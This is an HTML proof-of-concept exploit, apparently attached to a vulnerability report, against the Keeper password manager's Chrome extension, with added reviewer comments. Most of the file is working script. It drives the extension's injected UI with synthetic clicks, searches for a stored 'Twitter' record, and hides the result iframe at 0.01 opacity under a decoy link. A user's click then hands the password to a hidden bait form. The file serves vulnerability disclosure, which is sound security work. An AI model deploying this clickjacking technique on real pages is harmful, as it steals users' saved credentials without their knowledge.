
Issue 917 attachment: keeper.html (5.0 KB)

<html>
<head>
<script>

// Text typed into the extension's search box by interact(); it selects which
// stored record the demonstration goes after.
const kSearchTerm = "Twitter"; // What password to try to steal.
// Interval in milliseconds. Used for both polling timers and for the reload
// delay in interact().
const kPollTime = 1000; // How often to check if the Keeper UI is ready.

// Handle of the currently running setInterval. First set by the body's onload
// handler, then reassigned by interact() when it hands over to stealframe().
var timer;
// The extension's search-result iframe, assigned by stealframe() once found.
var frame;

// Interact with the UI elements Keeper adds to the page to bring up the search
// dialog.
//
// Called every kPollTime ms by the interval started in the body's onload
// handler. Each call does whatever the current UI state allows, so the steps
// below complete over several polls. Once the search box exists, this function
// stops its own interval and starts polling stealframe() instead.
//
// NOTE(review): every lookup below works only because the extension's controls
// are ordinary elements in the page's own DOM, reachable by id or class from
// page script. All clicks are synthetic (element.click()), so the resulting
// events have isTrusted === false; a handler that required trusted events
// would ignore them. Whether the extension checked this is not visible here.
function interact()
{
// Handles to the injected controls; each is null/undefined until the
// extension has drawn that part of its UI.
var icon = document.getElementById('keeper-icon-2');
var search = document.getElementsByClassName("ksec-icon-search")[0];
var input = document.getElementById('keeper-search-box-input');
var w = document.getElementById('keeper-injectWindow');
var create = document.getElementById('keeper-submitYesBtn');
// NOTE(review): `log` is looked up but never used in this function.
var log = document.getElementsByClassName('keepersecurity_loginField')[0];
var pw = document.getElementsByClassName('keepersecurity_tx')[0];
var save = document.getElementById('save-and-fill-btn');

// Click the little key icon added to input boxes.
if (icon)
icon.click();

// Sometimes a dialog prompts before the popup is shown, dismiss it.
// offsetParent is non-null only when the element is actually rendered, so
// this acts on the button only while it is visible.
if (create && create.offsetParent) {
create.click();
return;
}

// If it's prompting for a password, fill it in and then reload.
// "__ignore" is the sentinel that the password field's onchange handler in
// the form at the bottom of the page skips, so this filler value never
// triggers the alert.
if (pw && save && pw.offsetParent) {
pw.value = "__ignore";
save.click();
// The string argument is evaluated as code when the timer fires; the reload
// restarts the whole flow from onload.
setTimeout("document.location.reload()", kPollTime);
return;
}

// Click the search icon on the top of the popup.
if (search)
search.click();

// Hide the elements created by Keeper.
if (w)
w.style.display = "none";

// Enter the search term (kSearchTerm), which should add an iframe with
// results.
if (input) {
// Stop polling interact(); from here on only stealframe() is polled.
clearInterval(timer);
input.value = kSearchTerm;
// Setting .value fires no event, so a synthetic keyup is dispatched,
// presumably to make the extension's own key handler run the search.
input.dispatchEvent(new CustomEvent("keyup", {}))
timer = setInterval(stealframe, kPollTime);
}
}

// Poll for the extension's search-result iframe and, once it exists, re-parent
// it under the page's #target element, nearly transparent and at a fixed
// offset.
//
// NOTE(review): this is a UI-redress (clickjacking) pattern. The page never
// reads the frame's contents; it relies only on being able to move, resize and
// restyle a frame that sits in the page's own DOM. Because the embedding page
// controls where the frame sits and how visible it is, the durable fix is
// presumably on the extension side: do not render secret-releasing controls
// inside page-controlled DOM.
function stealframe()
{
frame = document.getElementById('keeper-search-result-frame-results');
// NOTE(review): `target` is assigned without var/let/const, so it becomes an
// implicit global rather than a local.
target = document.getElementById('target');

if (frame) {
// Found it; stop polling.
clearInterval(timer);

// We can't access the results, but we can move the iframe around, as
// soon as it appears, remove it.
frame.parentElement.removeChild(frame);
// #target is display:none in the stylesheet; reveal the decoy text now.
target.style.display = "block";
// Move the iframe somewhere predictable, but make it transparent so
// the user doesn't know they're clicking it.
frame.style.position = "absolute";
// Crop the frame to a 256x64 window with scrolling suppressed.
frame.style.width = "256px";
frame.style.height = "64px";
frame.style.overflowX = "hidden";
frame.style.overflowY = "hidden";
frame.style.overflow = "hidden";
// 0.01 rather than 0: effectively invisible to the user while the frame is
// still rendered.
frame.style.opacity = "0.01";
// The negative top offset shifts the frame's content upwards relative to
// #target; per the author's labels, it selects which of the frame's buttons
// ends up under the decoy.
//frame.style.top = "-30px"; // First button
frame.style.top = "-82px"; // Second button
frame.style.left = "0px";
// #target is position:relative, so the absolute offsets above are measured
// from it.
target.appendChild(frame);
}
}

</script>
<style>
/* Base typography for the visible explanation text. */
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 16px;
}

/* Hide all Keeper UI */
/* NOTE(review): `kwdiv` is not a standard HTML element; presumably it is the
   custom tag the extension uses for its injected UI. Opacity 0.01 keeps it
   rendered but practically invisible. */
kwdiv {
opacity: 0.01;
}

/* The decoy container stays hidden until stealframe() sets display:block. */
#target {
display: none;
}

/* The bait login form is rendered at near-zero opacity, so it is still drawn
   on the page but the user does not see it. */
#test {
opacity: 0.01;
}

/* Second rule for #target (merged with the one above by the cascade):
   position:relative makes it the positioning context for the absolutely
   positioned children and for the re-parented iframe. */
#target {
position: relative;
font-weight: bold;
}

/* Visible prompt text placed at the top-left of #target. */
#filltitle {
font-size: 14px;
padding: 6px 0px;
position: absolute;
top: 7px;
left: 7px;
}

/* This is the cssText from the real button */
/* The decoy has the real button's dimensions and is styled as a blue
   underlined link; its top/left offsets presumably line it up with the
   button inside the transparent frame. TODO confirm against the frame
   layout. */
#fillbutton {
font-family: Arial, Helvetica, sans-serif;
font-size: 14px;
line-height: 20px;
color: rgb(0, 0, 238);
width: 44px;
padding: 6px 0px;
height: 20px;
text-align: center;
font-weight: bold;
border: 1px hidden;
border-radius: 3px;
cursor: pointer;
float: right;
margin-right: 16px;
position: absolute;
top: 7px;
left: 185px;
text-decoration: underline;
}
</style>
</head>

<!-- onload starts the polling loop: interact() runs every kPollTime ms. -->
<body onload="timer = setInterval(interact, kPollTime)">

<p>
This demonstration attempts to automate interacting with the Keeper Chrome
extension so that the page can steal passwords.
</p>
<p>
This is done by:
<ul>
<!-- The image is fetched from a chrome-extension:// URL, so it loads only if
     the extension is installed and exposes that file to web pages. -->
<li>Creating a hidden form that keeper adds a button (<img src="chrome-extension://bfogiafebfohielmmehodmfbbebbbpei/images/16x16gold.png">) to.</li>
<li>Finding that button, then clicking it with JavaScript.</li>
<li>Keeper injects a search dialog into the page, which I enter "Twitter" into.</li>
<li>Waiting for Keeper to draw an iframe with the search results.</li>
<li>Moving the frame around so you don't know what you're clicking on.</li>
<li>If you do click it, the password is sent to the untrusted page.</li>
</ul>
</p>
<p>
The result is that if you click anywhere on a page, you could be sending a
password for another site.
</p>
<!-- Decoy shown by stealframe(); the transparent results iframe is appended
     inside this element. -->
<div id=target>
<div id=filltitle>Try clicking this link:</div>
<div id=fillbutton>Here</div>
</div>

<!-- Bait login form, styled nearly invisible by the #test rule. The password
     field's onchange handler shows any value other than the "__ignore"
     sentinel in an alert; here that stands in for a hostile page receiving
     the filled password. -->
<form id=test>
<input type=text name=username>
<input type=password name=password onchange="(value != '__ignore') && alert(value)">
</form>
</body>
</html>